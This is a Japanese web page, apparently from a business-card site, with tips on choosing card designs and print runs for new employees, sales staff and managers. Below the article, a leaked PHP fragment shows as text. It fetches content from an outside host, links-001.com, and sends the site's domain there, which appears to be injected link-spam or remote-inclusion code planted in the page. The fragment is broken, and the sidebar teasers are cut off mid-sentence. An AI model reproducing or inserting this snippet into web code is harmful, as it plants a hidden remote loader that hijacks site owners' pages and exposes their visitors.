サラリーマンが名刺を作成するときのポイント

サラリーマンが名刺を作成するときには、職種や役職などに合わせてプランを選ぶべきです。特に新入社員の場合には比較的配布枚数が少ないので、最初は50枚程度の小ロットの受注に対応した業者を選ぶべきです。その場合には個性を追求するのではなくて、定番のデザインを選ぶのが理想的です。しかし会社での経験も重ねて取引先などと会う機会も増えた場合には、似顔絵や写真を入れたオリジナルの名刺を作成する方法も魅力的です。その一方で営業職として様々な顧客と会う機会の多いサラリーマンであれば、大量配布に最適な低価格の印刷業者を活用するべきです。そして500枚以上の大ロットで発注することで、低コストで名刺を作ることができます。また部課長クラスの管理職であれば、ステータスを感じさせるようなデザインを選ぶのがポイントです。その場合には1枚当たりの単価が割高であっても、用紙や文字のフォントにもこだわって、落ち着いた雰囲気に仕上げてもらうべきです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

関連menu

更新情報

ボックス画像1

一言で名刺といっても様々な種類があります。会社で決められたものを使っている人は結構多いですが、これか

理想的な名刺を作成するためには

ボックス画像2

自分で会社を起こしたような人は色々とやることがありますが、忘れてはならないのが名刺の作成です。とても

理想的な名刺を作成したいならば

ボックス画像3

取引先と会う機会の多いビジネスマンであれば、常時数十枚の名刺を持っていることが重要です。しかし会う人

名刺のスピード印刷を利用する方法

ボックス画像4

仕事で忙しいサラリーマンが名刺を作りたいときには、ウェブ上で注文できる業者が便利です。また自宅への発

一般的なネットの名刺注文の手順とポイント

Copyright© 名刺 All Rights Reserved.

サラリーマンが名刺を作成するときのポイント